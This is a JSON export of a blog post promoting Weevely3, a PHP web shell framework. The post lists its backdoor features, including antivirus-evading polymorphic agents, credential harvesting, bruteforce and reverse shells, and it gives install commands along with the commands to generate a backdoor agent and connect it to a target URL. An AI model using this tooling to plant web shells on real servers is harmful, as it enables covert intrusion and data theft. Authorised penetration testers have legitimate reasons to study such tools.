{"id":2589,"date":"2015-09-21T05:51:35","date_gmt":"2015-09-21T05:51:35","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2589"},"modified":"2015-09-21T05:51:35","modified_gmt":"2015-09-21T05:51:35","slug":"weevely3-weaponized-php-web-shell","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2589","title":{"rendered":"Weevely3 &#8211; Weaponized PHP Web Shell"},"content":{"rendered":"<p><strong>Weevely<\/strong> is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.<br \/>\nThe low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.<br \/>\nThe weevely modules ecosystem provides a working shell interface even with no shell command execution, replacing the standard shell commands (e.g. the file editors, cd and ls, SQL cli and dump, compression utilities, port scanners, etc.) with the weevely modules.<br \/>\nThe weevely <a href=\"http:\/\/github.com\/epinna\/weevely3\/wiki\" target=\"_blank\" rel=\"noopener noreferrer\">wiki tutorials<\/a> shows some example on how to <a href=\"https:\/\/github.com\/epinna\/weevely3\/wiki\/Edit-db-and-code-of-a-web-app\" target=\"_blank\" rel=\"noopener noreferrer\">edit remote files<\/a>, <a href=\"https:\/\/github.com\/epinna\/weevely3\/wiki\/Harvest-other-users-credentials\" target=\"_blank\" rel=\"noopener noreferrer\">harvest and reuse some SQL credentials<\/a> or <a href=\"https:\/\/github.com\/epinna\/weevely3\/wiki\/Bruteforce-SQL--credentials\" target=\"_blank\" rel=\"noopener noreferrer\">bruteforce<\/a> them. Who wants can follow also the tutorial about <a href=\"http:\/\/github.com\/epinna\/weevely3\/wiki\/developing-a-new-module\" target=\"_blank\" rel=\"noopener noreferrer\">developing new modules<\/a>.<br \/>\nWeevely can be extended to automatize the auditing or privilege escalation tasks, exploit specific vulnerabilities, enumerate accounts, scrape sensitive data, pivot on the target to scan the internal networks, run HTTP or SQL requests and do a whole lot of other cool stuff.<br \/>\nWeevely is installed by default on BackBox, download it now or get your version of weevely <a href=\"https:\/\/github.com\/epinna\/weevely3\" target=\"_blank\" rel=\"noopener noreferrer\">here<\/a>.<br \/>\n<strong>Feature:<\/strong><\/p>\n<ul>\n<li>Shell\/PHP telnet-like network terminal<\/li>\n<li>Common server misconfigurations auditing<\/li>\n<li>SQL console pivoting on target<\/li>\n<li>HTTP traffic proxying through target<\/li>\n<li>Mount target file system to local mount point<\/li>\n<li>Conduct network scans pivoting on target<br \/>\nFile upload and download<\/li>\n<li>Spawn reverse and direct TCP shells<\/li>\n<li>Bruteforce services accounts<\/li>\n<li>Compress and decompress zip, gzip, bzip2 and tar archives<\/li>\n<\/ul>\n<p><strong>The backdoor agent<\/strong><br \/>\nThe remote agent is a very low footprint php script that receives dynamically injected code from the client, extending the client functionalities over the network at run-time. The agent code is polymorphic and hardly detectable by AV and HIDS. The communication is covered and obfuscated within the HTTP protocol using steganographic techniques.<br \/>\n<strong>Modules development<\/strong><br \/>\nWeevely also provides python API which can be used to develop your own module to implement internal audit, account enumerator, sensitive data scraper, network scanner, make the modules work as a HTTP or SQL client and do a whole lot of other cool stuff.<br \/>\n<strong>Installation<\/strong><br \/>\nFor Linux, the following example runs on a Debian\/Ubuntu derived Linux environments with Python version 2.7.<\/p>\n<pre># Make sure that the python package manager and yaml libraries are installed<\/pre>\n<pre>sudo apt-get install g++ python-pip libyaml-dev python-dev\n<\/pre>\n<p>Install requirements:<\/p>\n<pre>sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade\n<\/pre>\n<p>Generate the backdoor agent<\/p>\n<pre>\n .\/weevely.py \n[+] weevely 3.0\n[!] Error: too few arguments\n[+] Run terminal to the target\n    weevely <URL> <password>\n[+] Load session file\n    weevely session <path>\n[+] Generate backdoor agent\n    weevely generate <password> <path>\n<\/pre>\n<p>Connect the Agent:<\/p>\n<pre>\n  .\/weevely.py http:\/\/target\/agent.php mypassword\nweevely> \n<\/pre>\n<p><a href=\"https:\/\/github.com\/epinna\/weevely3\" target=\"_blank\" rel=\"noopener noreferrer\">Download Weevely3 at Github<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Weevely is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a<\/p>\n","protected":false},"author":1,"featured_media":2590,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[171,431,278],"tags":[28,482,331],"class_list":["post-2589","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-backbox","category-vulnerability-analysis","category-web-application","tag-backdoor","tag-bruteforce","tag-shell"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2589","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2589"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2589\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2589"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2589"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2589"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}